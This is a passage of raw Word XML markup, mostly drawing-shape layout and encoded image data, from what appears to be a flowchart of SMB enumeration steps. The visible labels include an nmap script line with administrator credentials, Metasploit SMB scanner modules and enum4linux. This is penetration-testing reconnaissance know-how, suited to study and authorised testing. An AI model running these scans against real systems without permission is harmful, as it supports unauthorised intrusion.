QAA&#10;DwAAAGRycy9kb3ducmV2LnhtbEyOy07DMBBF90j8gzVI7KjdENEqjVNRBAuWfXzANJ4mUeNxFDsP&#10;+HrcVVneh+49+Xa2rRip941jDcuFAkFcOtNwpeF0/HpZg/AB2WDrmDT8kIdt8fiQY2bcxHsaD6ES&#10;cYR9hhrqELpMSl/WZNEvXEccs4vrLYYo+0qaHqc4bluZKPUmLTYcH2rs6KOm8noYrIZPs7uY7ysP&#10;q5313e+UJqjGROvnp/l9AyLQHO5luOFHdCgi09kNbLxob1oEDQmImKWvqxTEOZpLtQZZ5PI/ffEH&#10;AAD//wMAUEsBAi0AFAAGAAgAAAAhALaDOJL+AAAA4QEAABMAAAAAAAAAAAAAAAAAAAAAAFtDb250&#10;ZW50X1R5cGVzXS54bWxQSwECLQAUAAYACAAAACEAOP0h/9YAAACUAQAACwAAAAAAAAAAAAAAAAAv&#10;AQAAX3JlbHMvLnJlbHNQSwECLQAUAAYACAAAACEAwEQrRnICAAA4BQAADgAAAAAAAAAAAAAAAAAu&#10;AgAAZHJzL2Uyb0RvYy54bWxQSwECLQAUAAYACAAAACEAE+pXedcAAAAFAQAADwAAAAAAAAAAAAAA&#10;AADMBAAAZHJzL2Rvd25yZXYueG1sUEsFBgAAAAAEAAQA8wAAANAF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3229F4" w:rsidRDefault="003229F4" w:rsidP="009F6E91">
                            <w:r w:rsidRPr="00D16CAE">
                              <w:t>smb-enum-services --script-args smbusername=administrator,smbpassword=password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229F4" w:rsidRPr="003229F4" w:rsidRDefault="003229F4" w:rsidP="003229F4"/>
          <w:p w:rsidR="003229F4" w:rsidRPr="003229F4" w:rsidRDefault="003229F4" w:rsidP="003229F4"/>
          <w:p w:rsidR="003229F4" w:rsidRDefault="003229F4" w:rsidP="003229F4"/>
          <w:p w:rsidR="003229F4" w:rsidRDefault="003229F4" w:rsidP="003229F4"/>
          <w:p w:rsidR="003229F4" w:rsidRPr="003229F4" w:rsidRDefault="003229F4" w:rsidP="00B90091">
            <w:r w:rsidRPr="00D16CAE">
              <w:t xml:space="preserve">- </w:t>
            </w:r>
            <w:r w:rsidR="00B90091">
              <w:t>enumerate</w:t>
            </w:r>
            <w:r w:rsidRPr="00D16CAE">
              <w:t xml:space="preserve"> running services</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00B90091" w:rsidRDefault="00B90091" w:rsidP="005F0D9E"/>
    <w:p w:rsidR="005F0D9E" w:rsidRDefault="009F6E91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145746</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="3029803" cy="498143"/>
                <wp:effectExtent l="0" t="0" r="18415" b="16510"/>
                <wp:wrapNone/>
                <wp:docPr id="21" name="Round Same Sid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803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CAE" w:rsidRPr="003229F4" w:rsidRDefault="00D16CAE" w:rsidP="00D16CA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229F4">
                              <w:rPr>
                                <w:sz w:val="32"/>
                              </w:rPr>
                              <w:t>Metasploit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1" o:spid="_x0000_s1042" style="position:absolute;margin-left:110.6pt;margin-top:11.5pt;width:238.55pt;height:3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803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YRfQIAAEgFAAAOAAAAZHJzL2Uyb0RvYy54bWysVE1v2zAMvQ/YfxB0Xx2nWdcGdYogRYcB&#10;RVc0HXpWZCkRIIsapcTOfv0o2UmKrpcNu9ik+PVIPer6pmss2ykMBlzFy7MRZ8pJqI1bV/zH892n&#10;S85CFK4WFpyq+F4FfjP7+OG69VM1hg3YWiGjJC5MW1/xTYx+WhRBblQjwhl45cioARsRScV1UaNo&#10;KXtji/FodFG0gLVHkCoEOr3tjXyW82utZPyudVCR2YoTtpi/mL+r9C1m12K6RuE3Rg4wxD+gaIRx&#10;VPSY6lZEwbZo/kjVGIkQQMczCU0BWhupcg/UTTl6081yI7zKvdBwgj+OKfy/tPJh94jM1BUfl5w5&#10;0dAdPcHW1WxJMluaWrEFoKNLeqJhCre2ipErza31YUrhS/+IgxZITEPoNDbpT+2xLs96f5y16iKT&#10;dHg+Gl9djs45k2SbXF2Wk/OUtDhFewzxq4KGJaHimFCNE6oEJA9b7O5D7IMOzpQh4eqRZCnurUpg&#10;rHtSmjpNtXN05phaWGQ7QeywMXdFALJnCtHG2mNQ+V6QkFK5eDEgH/xTqMrc+5vgY0SuDC4egxvj&#10;AN+rfoKse/9D933Pqf3Yrbp8vWUGmY5WUO/pzhH6ZQhe3hma8L0I8VEgsZ/2hDY6fqePttBWHAaJ&#10;sw3gr/fOkz+RkqyctbRNFQ8/twIVZ/abI7pelZNJWr+sTD5/GZOCry2r1xa3bRZAV0KMJHRZTP7R&#10;HkSN0LzQ4s9TVTIJJ6l2xWXEg7KI/ZbT0yHVfJ7daOW8iPdu6WVKngadePPcvQj0A80iEfQBDpsn&#10;pm841vumSAfzbQRtMgFPcx2ugNY1k3l4WtJ78FrPXqcHcPYbAAD//wMAUEsDBBQABgAIAAAAIQAf&#10;V/WP3wAAAAoBAAAPAAAAZHJzL2Rvd25yZXYueG1sTI/BbsIwDIbvk3iHyEi7jbRlqkrXFCEkLtuk&#10;iW4PEBqvLTRO1QToePp5p3Gz5U+/v79YT7YXFxx950hBvIhAINXOdNQo+PrcPWUgfNBkdO8IFfyg&#10;h3U5eyh0btyV9nipQiM4hHyuFbQhDLmUvm7Rar9wAxLfvt1odeB1bKQZ9ZXDbS+TKEql1R3xh1YP&#10;uG2xPlVnq2DapfHbbfXq7Ifrjtltn1VBviv1OJ82LyACTuEfhj99VoeSnQ7uTMaLXkGSxAmjPCy5&#10;EwPpKluCODAZxc8gy0LeVyh/AQAA//8DAFBLAQItABQABgAIAAAAIQC2gziS/gAAAOEBAAATAAAA&#10;AAAAAAAAAAAAAAAAAABbQ29udGVudF9UeXBlc10ueG1sUEsBAi0AFAAGAAgAAAAhADj9If/WAAAA&#10;lAEAAAsAAAAAAAAAAAAAAAAALwEAAF9yZWxzLy5yZWxzUEsBAi0AFAAGAAgAAAAhAFWGFhF9AgAA&#10;SAUAAA4AAAAAAAAAAAAAAAAALgIAAGRycy9lMm9Eb2MueG1sUEsBAi0AFAAGAAgAAAAhAB9X9Y/f&#10;AAAACgEAAA8AAAAAAAAAAAAAAAAA1wQAAGRycy9kb3ducmV2LnhtbFBLBQYAAAAABAAEAPMAAADj&#10;BQAAAAA=&#10;" adj="-11796480,,5400" path="m83025,l2946778,v45853,,83025,37172,83025,83025l3029803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2946778,0;3029803,83025;3029803,498143;3029803,498143;0,498143;0,498143;0,83025;83025,0" o:connectangles="0,0,0,0,0,0,0,0,0" textboxrect="0,0,3029803,498143"/>
                <v:textbox>
                  <w:txbxContent>
                    <w:p w:rsidR="00D16CAE" w:rsidRPr="003229F4" w:rsidRDefault="00D16CAE" w:rsidP="00D16CAE">
                      <w:pPr>
                        <w:jc w:val="center"/>
                        <w:rPr>
                          <w:sz w:val="32"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r w:rsidRPr="003229F4">
                        <w:rPr>
                          <w:sz w:val="32"/>
                        </w:rPr>
                        <w:t>Metasploit Scripts</w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D16CAE" w:rsidRDefault="00D16CAE" w:rsidP="005F0D9E"/>
    <w:p w:rsidR="00D16CAE" w:rsidRDefault="009F6E91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2687117</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>77546</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="453542" cy="344881"/>
                <wp:effectExtent l="19050" t="0" r="22860" b="3619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3448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4059" id="Down Arrow 39" o:spid="_x0000_s1026" type="#_x0000_t67" style="position:absolute;margin-left:211.6pt;margin-top:6.1pt;width:35.7pt;height:2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TxdwIAAEAFAAAOAAAAZHJzL2Uyb0RvYy54bWysVFFP2zAQfp+0/2D5faQt6QYVKapATJMQ&#10;VMDEs3FsEsn2eWe3affrd3bSgADtYVofXNt3993dl+98dr6zhm0VhhZcxadHE86Uk1C37rniPx+u&#10;vpxwFqJwtTDgVMX3KvDz5edPZ51fqBk0YGqFjEBcWHS+4k2MflEUQTbKinAEXjkyakArIh3xuahR&#10;dIRuTTGbTL4WHWDtEaQKgW4veyNfZnytlYy3WgcVmak41Rbzinl9SmuxPBOLZxS+aeVQhviHKqxo&#10;HSUdoS5FFGyD7Tso20qEADoeSbAFaN1KlXugbqaTN93cN8Kr3AuRE/xIU/h/sPJmu0bW1hU/PuXM&#10;CUvf6BI6x1aI0DG6JIY6HxbkeO/XOJwCbVO7O402/VMjbJdZ3Y+sql1kki7L+fG8nHEmyXRclicn&#10;04RZvAR7DPG7AsvSpuI1pc/ZM6Fiex1i73/wo+BUUV9D3sW9UakM4+6Upm4o6yxHZx2pC4NsK0gB&#10;Qkrl4rQ3NaJW/fV8Qr+hqDEil5gBE7JujRmxB4Ck0ffYfa2DfwpVWYZj8ORvhfXBY0TODC6OwbZ1&#10;gB8BGOpqyNz7H0jqqUksPUG9p2+N0A9B8PKqJcKvRYhrgaR6mg+a5HhLizbQVRyGHWcN4O+P7pM/&#10;iZGsnHU0RRUPvzYCFWfmhyOZnk7LMo1dPpTzbzM64GvL02uL29gLoM80pTfDy7xN/tEcthrBPtLA&#10;r1JWMgknKXfFZcTD4SL2001PhlSrVXajUfMiXrt7LxN4YjVp6WH3KNAPqosk1xs4TJxYvNFd75si&#10;Haw2EXSbRfnC68A3jWkWzvCkpHfg9Tl7vTx8yz8AAAD//wMAUEsDBBQABgAIAAAAIQCuO1Cx3QAA&#10;AAkBAAAPAAAAZHJzL2Rvd25yZXYueG1sTI9NT8MwDIbvSPyHyEjcWNIPqq00nRASnGFUiGPWmLbQ&#10;OKXJtsKvx5zgZFnvo9ePq+3iRnHEOQyeNCQrBQKp9XagTkPzfH+1BhGiIWtGT6jhCwNs6/OzypTW&#10;n+gJj7vYCS6hUBoNfYxTKWVoe3QmrPyExNmbn52JvM6dtLM5cbkbZapUIZ0ZiC/0ZsK7HtuP3cFp&#10;+B5kq9zjS1Sv2ef7QzI2SUaN1pcXy+0NiIhL/IPhV5/VoWanvT+QDWLUkKdZyigHKU8G8k1egNhr&#10;KIprkHUl/39Q/wAAAP//AwBQSwECLQAUAAYACAAAACEAtoM4kv4AAADhAQAAEwAAAAAAAAAAAAAA&#10;AAAAAAAAW0NvbnRlbnRfVHlwZXNdLnhtbFBLAQItABQABgAIAAAAIQA4/SH/1gAAAJQBAAALAAAA&#10;AAAAAAAAAAAAAC8BAABfcmVscy8ucmVsc1BLAQItABQABgAIAAAAIQCBcCTxdwIAAEAFAAAOAAAA&#10;AAAAAAAAAAAAAC4CAABkcnMvZTJvRG9jLnhtbFBLAQItABQABgAIAAAAIQCuO1Cx3QAAAAkBAAAP&#10;AAAAAAAAAAAAAAAAANEEAABkcnMvZG93bnJldi54bWxQSwUGAAAAAAQABADzAAAA2wUAAAAA&#10;" adj="10800" fillcolor="#5b9bd5 [3204]" strokecolor="#1f4d78 [1604]" strokeweight="1pt"/>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D16CAE" w:rsidRDefault="00D16CAE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9794C" wp14:editId="097F300E">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>1499870</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>130912</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="2818263" cy="334370"/>
                <wp:effectExtent l="0" t="0" r="20320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334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CAE" w:rsidRDefault="00D16CAE" w:rsidP="003229F4">
                            <w:pPr>
                              <w:jc w:val="center"/>
                            </w:pPr>
                            <w:r>
                              <w:t>auxiliary/scanner/smb/smb_version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9794C" id="Rounded Rectangle 17" o:spid="_x0000_s1043" style="position:absolute;margin-left:118.1pt;margin-top:10.3pt;width:221.9pt;height:2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8tcgIAADgFAAAOAAAAZHJzL2Uyb0RvYy54bWysVNtqGzEQfS/0H4Tem/XazqUm62ASUgoh&#10;CUlKnmWtZC/VatSR7F336zvSXhLSQEvpi1azcz9zRucXbW3YXqGvwBY8P5pwpqyEsrKbgn97uv50&#10;xpkPwpbCgFUFPyjPL5YfP5w3bqGmsAVTKmQUxPpF4wq+DcEtsszLraqFPwKnLCk1YC0CibjJShQN&#10;Ra9NNp1MTrIGsHQIUnlPf686JV+m+ForGe609iowU3CqLaQT07mOZ7Y8F4sNCretZF+G+IcqalFZ&#10;SjqGuhJBsB1Wv4WqK4ngQYcjCXUGWldSpR6om3zyppvHrXAq9ULgeDfC5P9fWHm7v0dWlTS7U86s&#10;qGlGD7CzpSrZA6En7MYoRjoCqnF+QfaP7h57ydM1dt1qrOOX+mFtAvcwgqvawCT9nJ7lZ9OTGWeS&#10;dLPZfHaa0M9evB368EVBzeKl4BjLiDUkYMX+xgdKS/aDHQmxpK6IdAsHo2Idxj4oTV1R2jx5Jz6p&#10;S4NsL4gJQkplw3FsiuIl6+imK2NGx+mfHXv76KoS10bnv8g6eqTMYMPoXFcW8L3s5fe8L1l39gMC&#10;Xd8RgtCu22Gc/ZDWUB5oxggd+b2T1xUBfCN8uBdIbKe9oA0Od3RoA03Bob9xtgX8+d7/aE8kJC1n&#10;DW1Pwf2PnUDFmflqiZ6f8/k8rlsS5senUxLwtWb9WmN39SXQWHJ6K5xM12gfzHDVCPUzLfoqZiWV&#10;sJJyF1wGHITL0G01PRVSrVbJjFbMiXBjH50ciBC589Q+C3Q9ywLx8xaGTROLNzzrbOOILKx2AXSV&#10;SBih7nDtR0DrmbjUPyVx/1/LyerlwVv+AgAA//8DAFBLAwQUAAYACAAAACEAyoZPDNwAAAAJAQAA&#10;DwAAAGRycy9kb3ducmV2LnhtbEyPy07DMBBF90j8gzVI7KiNg9IqxKkoggVLCh/gxtMkajyOYucB&#10;X8+wgt2M5ujOueV+9b2YcYxdIAP3GwUCqQ6uo8bA58fr3Q5ETJac7QOhgS+MsK+ur0pbuLDQO87H&#10;1AgOoVhYA21KQyFlrFv0Nm7CgMS3cxi9TbyOjXSjXTjc91IrlUtvO+IPrR3wucX6cpy8gRd3OLu3&#10;C03bg4/D9/KgrZq1Mbc369MjiIRr+oPhV5/VoWKnU5jIRdEb0FmuGeVB5SAYyHeKy50MbLMMZFXK&#10;/w2qHwAAAP//AwBQSwECLQAUAAYACAAAACEAtoM4kv4AAADhAQAAEwAAAAAAAAAAAAAAAAAAAAAA&#10;W0NvbnRlbnRfVHlwZXNdLnhtbFBLAQItABQABgAIAAAAIQA4/SH/1gAAAJQBAAALAAAAAAAAAAAA&#10;AAAAAC8BAABfcmVscy8ucmVsc1BLAQItABQABgAIAAAAIQDem28tcgIAADgFAAAOAAAAAAAAAAAA&#10;AAAAAC4CAABkcnMvZTJvRG9jLnhtbFBLAQItABQABgAIAAAAIQDKhk8M3AAAAAkBAAAPAAAAAAAA&#10;AAAAAAAAAMw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16CAE" w:rsidRDefault="00D16CAE" w:rsidP="003229F4">
                      <w:pPr>
                        <w:jc w:val="center"/>
                      </w:pPr>
                      <w:r>
                        <w:t>auxiliary/scanner/smb/smb_version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6CAE" w:rsidRDefault="0028154B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6F07D0" wp14:editId="438B9892">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>1501800</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>236728</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="2818130" cy="327546"/>
                <wp:effectExtent l="0" t="0" r="20320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3275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9F4" w:rsidRDefault="003229F4" w:rsidP="003229F4">
                            <w:pPr>
                              <w:jc w:val="center"/>
                            </w:pPr>
                            <w:r>
                              <w:t>auxiliary/scanner/smb/smb2</w:t>
                            </w:r>
                          </w:p>
                          <w:p w:rsidR="003229F4" w:rsidRDefault="003229F4" w:rsidP="00322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F07D0" id="Rounded Rectangle 40" o:spid="_x0000_s1044" style="position:absolute;margin-left:118.25pt;margin-top:18.65pt;width:221.9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5JcAIAADgFAAAOAAAAZHJzL2Uyb0RvYy54bWysVN9P2zAQfp+0/8Hy+0hTCnRVU1SBmCYh&#10;QMDEs+vYbTTH553dJt1fv7OThoohbZr2kvh8v7/7zvPLtjZsp9BXYAuen4w4U1ZCWdl1wb8933ya&#10;cuaDsKUwYFXB98rzy8XHD/PGzdQYNmBKhYyCWD9rXME3IbhZlnm5UbXwJ+CUJaUGrEUgEddZiaKh&#10;6LXJxqPRedYAlg5BKu/p9rpT8kWKr7WS4V5rrwIzBafaQvpi+q7iN1vMxWyNwm0q2Zch/qGKWlSW&#10;kg6hrkUQbIvVb6HqSiJ40OFEQp2B1pVUqQfqJh+96eZpI5xKvRA43g0w+f8XVt7tHpBVZcEnBI8V&#10;Nc3oEba2VCV7JPSEXRvFSEdANc7PyP7JPWAveTrGrluNdfxTP6xN4O4HcFUbmKTL8TSf5qeURJLu&#10;dHxxNjmPQbNXb4c+fFFQs3goOMYyYg0JWLG79aGzP9iRcyypKyKdwt6oWIexj0pTV5Q2T96JT+rK&#10;INsJYoKQUtlw1udP1tFNV8YMjuM/O/b20VUlrg3Of5F18EiZwYbBua4s4HvZy+95X7Lu7A8IdH1H&#10;CEK7atM482k0jVcrKPc0Y4SO/N7Jm4oAvhU+PAgkttNMaIPDPX20gabg0J842wD+fO8+2hMJSctZ&#10;Q9tTcP9jK1BxZr5aoufnfBL5FJIwObsYk4DHmtWxxm7rK6Cx5PRWOJmO0T6Yw1Ej1C+06MuYlVTC&#10;SspdcBnwIFyFbqvpqZBquUxmtGJOhFv75OSBCJE7z+2LQNezLBA/7+CwaWL2hmedbRyRheU2gK4S&#10;CV9x7UdA65m43D8lcf+P5WT1+uAtfgEAAP//AwBQSwMEFAAGAAgAAAAhADoV637dAAAACQEAAA8A&#10;AABkcnMvZG93bnJldi54bWxMj8tOxDAMRfdI/ENkJHZMQgudUpqOGAQLlgx8gKfxtNU0TtWkD/h6&#10;wgp2tnx0fW65W20vZhp951jD7UaBIK6d6bjR8PnxepOD8AHZYO+YNHyRh111eVFiYdzC7zQfQiNi&#10;CPsCNbQhDIWUvm7Jot+4gTjeTm60GOI6NtKMuMRw28tEqUxa7Dh+aHGg55bq82GyGl7M/mTezjxt&#10;99YP38tdgmpOtL6+Wp8eQQRawx8Mv/pRHarodHQTGy96DUma3UdUQ7pNQUQgy1Ucjhry/AFkVcr/&#10;DaofAAAA//8DAFBLAQItABQABgAIAAAAIQC2gziS/gAAAOEBAAATAAAAAAAAAAAAAAAAAAAAAABb&#10;Q29udGVudF9UeXBlc10ueG1sUEsBAi0AFAAGAAgAAAAhADj9If/WAAAAlAEAAAsAAAAAAAAAAAAA&#10;AAAALwEAAF9yZWxzLy5yZWxzUEsBAi0AFAAGAAgAAAAhACsbzklwAgAAOAUAAA4AAAAAAAAAAAAA&#10;AAAALgIAAGRycy9lMm9Eb2MueG1sUEsBAi0AFAAGAAgAAAAhADoV637dAAAACQEAAA8AAAAAAAAA&#10;AAAAAAAAy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229F4" w:rsidRDefault="003229F4" w:rsidP="003229F4">
                      <w:pPr>
                        <w:jc w:val="center"/>
                      </w:pPr>
                      <w:r>
                        <w:t>auxiliary/scanner/smb/smb2</w:t>
                      </w:r>
                    </w:p>
                    <w:p w:rsidR="003229F4" w:rsidRDefault="003229F4" w:rsidP="003229F4"/>
                  </w:txbxContent>
                </v:textbox>
              </v:roundrect>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D16CAE" w:rsidRDefault="00D16CAE" w:rsidP="005F0D9E"/>
    <w:p w:rsidR="003229F4" w:rsidRDefault="003229F4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4CC6D1" wp14:editId="5974399C">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>1501800</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>35611</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="2818130" cy="320722"/>
                <wp:effectExtent l="0" t="0" r="20320" b="2222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32072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9F4" w:rsidRDefault="003229F4" w:rsidP="003229F4">
                            <w:pPr>
                              <w:jc w:val="center"/>
                            </w:pPr>
                            <w:r>
                              <w:t>auxiliary/smb/smb_enumshares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CC6D1" id="Rounded Rectangle 41" o:spid="_x0000_s1045" style="position:absolute;margin-left:118.25pt;margin-top:2.8pt;width:221.9pt;height:2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y+cQIAADgFAAAOAAAAZHJzL2Uyb0RvYy54bWysVFtP2zAUfp+0/2D5faQJZUBFiqoipkkI&#10;KmDi2XXsNprt49luk+7X79i5UDGkTdNeHJ+c+3e+46vrViuyF87XYEqan0woEYZDVZtNSb893366&#10;oMQHZiqmwIiSHoSn1/OPH64aOxMFbEFVwhEMYvyssSXdhmBnWeb5VmjmT8AKg0oJTrOAottklWMN&#10;RtcqKyaTz1kDrrIOuPAe/950SjpP8aUUPDxI6UUgqqRYW0inS+c6ntn8is02jtltzfsy2D9UoVlt&#10;MOkY6oYFRnau/i2UrrkDDzKccNAZSFlzkXrAbvLJm26etsyK1AuC4+0Ik/9/Yfn9fuVIXZV0mlNi&#10;mMYZPcLOVKIij4geMxslCOoQqMb6Gdo/2ZXrJY/X2HUrnY5f7Ie0CdzDCK5oA+H4s7jIL/JTnAFH&#10;3WkxOS+KGDR79bbOhy8CNImXkrpYRqwhAcv2dz509oMdOseSuiLSLRyUiHUo8ygkdoVp8+Sd+CSW&#10;ypE9QyYwzoUJZ33+ZB3dZK3U6Fj82bG3j64icW10/ouso0fKDCaMzro24N7LXn1Pc0DIZGc/IND1&#10;HSEI7bpN48wvh5GtoTrgjB105PeW39YI8B3zYcUcsh1nghscHvCQCpqSQn+jZAvu53v/oz2SELWU&#10;NLg9JfU/dswJStRXg/S8zKfTuG5JmJ6dFyi4Y836WGN2egk4FmQgVpeu0T6o4Sod6Bdc9EXMiipm&#10;OOYuKQ9uEJah22p8KrhYLJIZrphl4c48WT4QIXLnuX1hzvYsC8jPexg2jc3e8KyzjSMysNgFkHUi&#10;YYS6w7UfAa5n4nL/lMT9P5aT1euDN/8FAAD//wMAUEsDBBQABgAIAAAAIQCYBLWY2wAAAAgBAAAP&#10;AAAAZHJzL2Rvd25yZXYueG1sTI/NTsMwEITvSLyDtZW4UbspDVUap6IIDhxpeYBtvE2ixusodn7g&#10;6XFPcBzNaOabfD/bVozU+8axhtVSgSAunWm40vB1en/cgvAB2WDrmDR8k4d9cX+XY2bcxJ80HkMl&#10;Ygn7DDXUIXSZlL6syaJfuo44ehfXWwxR9pU0PU6x3LYyUSqVFhuOCzV29FpTeT0OVsObOVzMx5WH&#10;54P13c/0lKAaE60fFvPLDkSgOfyF4YYf0aGITGc3sPGi1ZCs002MatikIKKfbtUaxPmmVyCLXP4/&#10;UPwCAAD//wMAUEsBAi0AFAAGAAgAAAAhALaDOJL+AAAA4QEAABMAAAAAAAAAAAAAAAAAAAAAAFtD&#10;b250ZW50X1R5cGVzXS54bWxQSwECLQAUAAYACAAAACEAOP0h/9YAAACUAQAACwAAAAAAAAAAAAAA&#10;AAAvAQAAX3JlbHMvLnJlbHNQSwECLQAUAAYACAAAACEAD4lcvnECAAA4BQAADgAAAAAAAAAAAAAA&#10;AAAuAgAAZHJzL2Uyb0RvYy54bWxQSwECLQAUAAYACAAAACEAmAS1mNsAAAAIAQAADwAAAAAAAAAA&#10;AAAAAADL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3229F4" w:rsidRDefault="003229F4" w:rsidP="003229F4">
                      <w:pPr>
                        <w:jc w:val="center"/>
                      </w:pPr>
                      <w:r>
                        <w:t>auxiliary/smb/smb_enumshares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54B" w:rsidRDefault="0028154B" w:rsidP="005F0D9E"/>
    <w:p w:rsidR="003229F4" w:rsidRDefault="009F6E91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36E6EB" wp14:editId="7745837C">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>1353312</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>202489</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="3080588" cy="498143"/>
                <wp:effectExtent l="0" t="0" r="24765" b="16510"/>
                <wp:wrapNone/>
                <wp:docPr id="42" name="Round Same Sid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88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9F4" w:rsidRPr="003229F4" w:rsidRDefault="003229F4" w:rsidP="00D16CA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229F4">
                              <w:rPr>
                                <w:sz w:val="32"/>
                              </w:rPr>
                              <w:t>enum4linux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E6EB" id="Round Same Side Corner Rectangle 42" o:spid="_x0000_s1046" style="position:absolute;margin-left:106.55pt;margin-top:15.95pt;width:242.55pt;height:3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588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jDfQIAAEgFAAAOAAAAZHJzL2Uyb0RvYy54bWysVN9v2jAQfp+0/8Hy+wihtKOooUJUnSZV&#10;bVU69dk4NkRyfN7ZkLC/fmcnQNXxsmkvydl33/38zje3bW3YTqGvwBY8Hww5U1ZCWdl1wX+83n+Z&#10;cOaDsKUwYFXB98rz29nnTzeNm6oRbMCUChk5sX7auIJvQnDTLPNyo2rhB+CUJaUGrEWgI66zEkVD&#10;3muTjYbDq6wBLB2CVN7T7V2n5LPkX2slw5PWXgVmCk65hfTF9F3Fbza7EdM1CrepZJ+G+IcsalFZ&#10;Cnp0dSeCYFus/nBVVxLBgw4DCXUGWldSpRqomnz4oZrlRjiVaqHmeHdsk/9/buXj7hlZVRZ8POLM&#10;ippm9AJbW7IlyWxZlYotAC0N6YWaKezaKEam1LfG+SnBl+4Z+5MnMTah1VjHP5XH2tTr/bHXqg1M&#10;0uXFcDK8nBA7JOnG15N8fBGdZie0Qx++KahZFAqOMatRzComkpotdg8+dKCDMXmIeXWZJCnsjYrJ&#10;GPuiNFUaYyd04phaGGQ7QewwIe8TSJYRoitjjqD8HEhIqWy46oG9fYSqxL2/AR8RKTLYcATXlQU8&#10;F/2Usu7sD9V3NcfyQ7tq03hHievxagXlnmaO0C2Dd/K+og4/CB+eBRL7aU9oo8MTfbSBpuDQS5xt&#10;AH+du4/2RErSctbQNhXc/9wKVJyZ75boep2Px3H90mF8+ZWyYfhes3qvsdt6ATSSnN4OJ5MY7YM5&#10;iBqhfqPFn8eopBJWUuyCy4CHwyJ0W05Ph1TzeTKjlXMiPNilk9F5bHTkzWv7JtD1NAtE0Ec4bJ6Y&#10;fuBYZxuRFubbALpKBDz1tR8BrWsic/+0xPfg/TlZnR7A2W8AAAD//wMAUEsDBBQABgAIAAAAIQBU&#10;HLQK3gAAAAoBAAAPAAAAZHJzL2Rvd25yZXYueG1sTI9BTsMwEEX3SNzBGiR21HEiVW2IU6GWwo5C&#10;ywHceIgj4nGI3TbcnmEFy9F/+v9NtZp8L844xi6QBjXLQCA1wXbUang/bO8WIGIyZE0fCDV8Y4RV&#10;fX1VmdKGC73heZ9awSUUS6PBpTSUUsbGoTdxFgYkzj7C6E3ic2ylHc2Fy30v8yybS2864gVnBlw7&#10;bD73J6/h8XUnh8M6BbeNT3H39bwZXsxG69ub6eEeRMIp/cHwq8/qULPTMZzIRtFryFWhGNVQqCUI&#10;BubLRQ7iyKTKCpB1Jf+/UP8AAAD//wMAUEsBAi0AFAAGAAgAAAAhALaDOJL+AAAA4QEAABMAAAAA&#10;AAAAAAAAAAAAAAAAAFtDb250ZW50X1R5cGVzXS54bWxQSwECLQAUAAYACAAAACEAOP0h/9YAAACU&#10;AQAACwAAAAAAAAAAAAAAAAAvAQAAX3JlbHMvLnJlbHNQSwECLQAUAAYACAAAACEAv2Eow30CAABI&#10;BQAADgAAAAAAAAAAAAAAAAAuAgAAZHJzL2Uyb0RvYy54bWxQSwECLQAUAAYACAAAACEAVBy0Ct4A&#10;AAAKAQAADwAAAAAAAAAAAAAAAADXBAAAZHJzL2Rvd25yZXYueG1sUEsFBgAAAAAEAAQA8wAAAOIF&#10;AAAAAA==&#10;" adj="-11796480,,5400" path="m83025,l2997563,v45853,,83025,37172,83025,83025l3080588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2997563,0;3080588,83025;3080588,498143;3080588,498143;0,498143;0,498143;0,83025;83025,0" o:connectangles="0,0,0,0,0,0,0,0,0" textboxrect="0,0,3080588,498143"/>
                <v:textbox>
                  <w:txbxContent>
                    <w:p w:rsidR="003229F4" w:rsidRPr="003229F4" w:rsidRDefault="003229F4" w:rsidP="00D16CAE">
                      <w:pPr>
                        <w:jc w:val="center"/>
                        <w:rPr>
                          <w:sz w:val="32"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r w:rsidRPr="003229F4">
                        <w:rPr>
                          <w:sz w:val="32"/>
                        </w:rPr>
                        <w:t>enum4linux</w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w:rsidR="003229F4" w:rsidRDefault="003229F4" w:rsidP="005F0D9E"/>
    <w:p w:rsidR="003229F4" w:rsidRDefault="009F6E91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638203" wp14:editId="747F8521">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>2578252</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>124943</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="468173" cy="351130"/>
